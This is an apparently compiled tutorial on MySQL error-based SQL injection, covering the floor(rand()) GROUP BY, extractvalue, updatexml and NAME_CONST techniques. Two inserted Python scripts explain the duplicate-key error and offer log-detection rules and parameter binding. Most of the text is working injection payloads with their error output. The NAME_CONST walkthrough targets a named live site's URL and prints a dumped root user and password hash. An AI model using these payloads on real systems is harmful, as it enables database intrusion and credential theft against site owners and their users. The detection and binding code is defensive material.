1. Error-based injection via floor()

The following payloads can be used to trigger the error:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example. Start with a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement forces an error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace version() with the subquery you want.

For example, to retrieve the administrator's username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test payload:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test payload:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
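Why the floor() method in section 1 ends in a duplicate-key error rather than a result set is easier to see in code. The following Python script is an added example and is not part of the original post: it re-implements MySQL's seeded RAND() generator (the my_rnd() linear congruential generator, seeded the way RAND(N) seeds it) and models how GROUP BY fills its temporary table, where the group key is evaluated once for the lookup and evaluated again for the insert when the key is absent. The class and function names are this example's own; the article's `5.1.33-community-log` prefix is reused only as the constant part of the key.

```python
"""Model of why `count(*), concat(x, floor(rand(0)*2)) ... group by` raises ERROR 1062.

Added example, not from the original post. MySQLRand reproduces MySQL's
my_rnd() generator as seeded by RAND(N); simulate_group_by() models the
GROUP BY temporary table, whose unique index on the group key is what
rejects the second insert.
"""
from typing import Dict, List, Optional, Tuple

MAX_VALUE = 0x3FFFFFFF  # my_rnd() modulus


class MySQLRand:
    """MySQL's my_rnd() generator, seeded the way RAND(N) seeds it."""

    def __init__(self, seed: int) -> None:
        # Item_func_rand::seed_random(): randominit(N*0x10001+55555555, N*0x10000001)
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def rand(self) -> float:
        # my_rnd(): two-register linear congruential step, result in [0, 1)
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_sequence(seed: int, n: int) -> List[int]:
    """floor(rand(seed)*2) for n successive evaluations; deterministic for a fixed seed."""
    r = MySQLRand(seed)
    return [int(r.rand() * 2) for _ in range(n)]


def simulate_group_by(prefix: str, rows: int, seed: int = 0) -> Tuple[Optional[str], Dict[str, int]]:
    """Model `select count(*), concat(prefix, floor(rand(seed)*2)) x from T group by x`
    over a table of `rows` rows.

    Returns (duplicate_key, groups). A non-None duplicate_key is the value MySQL
    would report in "ERROR 1062 Duplicate entry '<key>' for key 'group_key'".
    """
    r = MySQLRand(seed)
    groups: Dict[str, int] = {}          # the GROUP BY temporary table
    for _ in range(rows):
        key = prefix + str(int(r.rand() * 2))   # evaluated once to look the group up
        if key in groups:
            groups[key] += 1
            continue
        key = prefix + str(int(r.rand() * 2))   # evaluated again to build the new row
        if key in groups:                       # unique index on group_key -> ERROR 1062
            return key, groups
        groups[key] = 1
    return None, groups


if __name__ == "__main__":
    print("floor(rand(0)*2):", floor_rand_sequence(0, 10))
    for n in (1, 2, 3):
        dup, groups = simulate_group_by("5.1.33-community-log", n)
        print(f"{n} rows -> duplicate key: {dup!r}, groups: {groups}")
```

With seed 0 the first evaluations of floor(rand(0)*2) are 0, 1, 1, 0, 1, ...: row 1 looks up key ...0, misses, and inserts under the re-evaluated key ...1; row 2 finds ...1; row 3 looks up ...0, misses, re-evaluates to ...1 and collides with the temporary table's unique index, which is the "Duplicate entry ... for key 'group_key'" the article shows. This is why the technique needs a source table with at least three rows (information_schema.tables always has them) and why an unseeded rand() fires only sometimes. For a defender the useful observation is that the error text, not the query result, is the channel: binding id as a parameter and not returning raw database errors to the client closes it.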
More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injecting with NAME_CONST
It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything older than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

Code:
SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST when trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, it works here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
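Every technique on this page (the floor/rand GROUP BY trick, extractvalue, updatexml and the NAME_CONST duplicate-column error) depends on the same two defects: the id parameter is concatenated into the SQL text, and the database's error text is echoed back to the client. The following Python script is an added example and is not part of the original post. It flags those four primitives in constructed access-log lines (the payload shapes are the page's own, placed on a placeholder path) and shows a lookup that binds the parameter instead of concatenating it. sqlite3 stands in for MySQL so the script runs offline; the rule names, functions and log lines are this example's own.

```python
"""Detect the error-based primitives shown on this page in access logs, and
show the parameter binding that removes the bug they rely on.

Added example, not from the original post. SAMPLE_LOG is constructed; the
lookup uses sqlite3 as an offline stand-in for MySQL.
"""
import re
import sqlite3
from typing import List, Tuple
from urllib.parse import unquote_plus

# One rule per error-based primitive. Patterns run over the URL-decoded,
# whitespace-collapsed, lower-cased request path.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("floor-rand-groupby", re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by")),
    ("extractvalue",       re.compile(r"\bextractvalue\s*\(")),
    ("updatexml",          re.compile(r"\bupdatexml\s*\(")),
    ("name_const",         re.compile(r"\bname_const\s*\(")),
]

# Common Log Format: ip ident user [time] "METHOD path proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one benign request, then the page's payload shapes.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /detail.php?id=330 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 612',
    '203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /detail.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user())))-- HTTP/1.1" 500 598',
    '203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] "GET /detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 640',
]


def normalise(path: str) -> str:
    """URL-decode twice (to see through double encoding), collapse whitespace, fold case."""
    decoded = unquote_plus(unquote_plus(path))
    return re.sub(r"\s+", " ", decoded).lower()


def classify(path: str) -> List[str]:
    """Names of every rule that matches this request path (empty list if clean)."""
    text = normalise(path)
    return [name for name, pattern in RULES if pattern.search(text)]


def scan_log(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """(client_ip, status, matched_rules) for each request that matches a rule."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        rules = classify(m["path"])
        if rules:
            hits.append((m["ip"], m["status"], rules))
    return hits


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the article table from the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO article VALUES (1, 'test')")
    return db


def lookup_article(db: sqlite3.Connection, raw_id: str) -> List[Tuple[int, str]]:
    """Hardened lookup: the request value is bound as a parameter, never spliced
    into the SQL text, so '1 and extractvalue(...)' is just a string that matches no id."""
    cur = db.execute("SELECT id, title FROM article WHERE id = ?", (raw_id,))
    return cur.fetchall()


if __name__ == "__main__":
    for ip, status, rules in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} rules={rules}")
    db = demo_db()
    print(lookup_article(db, "1"))
    print(lookup_article(db, "1 and extractvalue(1,concat(0x5c,(select user())))"))
```

The rules are applied to the decoded, whitespace-collapsed, lower-cased path so that `+`, `%20` and mixed case do not evade them; in practice they are most useful combined with a burst of HTTP 500 responses from one client, which is what error-based extraction looks like in a log. On the application side, binding the parameter means the injected text is compared against id as a literal and matches nothing; the same `execute(sql, params)` shape applies to any DB-API MySQL driver.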